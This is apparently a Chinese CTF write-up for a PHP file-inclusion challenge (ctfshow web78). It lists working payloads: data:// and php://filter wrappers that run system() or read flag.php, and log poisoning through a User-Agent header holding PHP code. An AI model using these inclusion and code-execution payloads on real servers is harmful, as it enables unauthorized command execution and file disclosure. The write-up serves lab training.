[ctfshow web入门] web78

信息收集

表面上没有任何过滤,自由发挥

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

这些解法都在web32解释过,不再详细解释,有需要点击超链接:[ctfshow web入门] web32

伪协议

php 复制代码
?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

php 复制代码
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码
<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

web124    目录    web79

相关推荐
支付宝体验科技几秒前
SEE Conf 2025:开启体验科技的新十年
前端
TeamDev2 分钟前
使用 Shadcn UI 构建 C# 桌面应用
前端·后端·.net
尘世中一位迷途小书童28 分钟前
Vuetify Admin 后台管理系统
前端·前端框架·开源
参宿729 分钟前
图解Vue3 响应式,手动实现核心原理
前端·javascript·vue.js
2301_8012522235 分钟前
前端框架Vue(Vue 的挂载点与 data 数据对象)
java·前端·javascript·vue.js·前端框架
资讯第一线1 小时前
《Windows Server 2022》 [2025年10月版 ] [官方IOS] 下载
前端
非凡ghost1 小时前
EaseUS Fixo(易我视频照片修复)
前端·javascript·后端
非凡ghost1 小时前
Avast Cleanup安卓版(手机清理优化)
前端·javascript·后端
豆苗学前端1 小时前
长时间不操作自动退出登录(系统非活跃状态下自动登出机制的企业级设计方案)
前端·后端·面试
一乐小哥1 小时前
用 AI 搞出 Chrome 版 “飞书 Command+K”!Figma AI 救了我的审美
前端·ai编程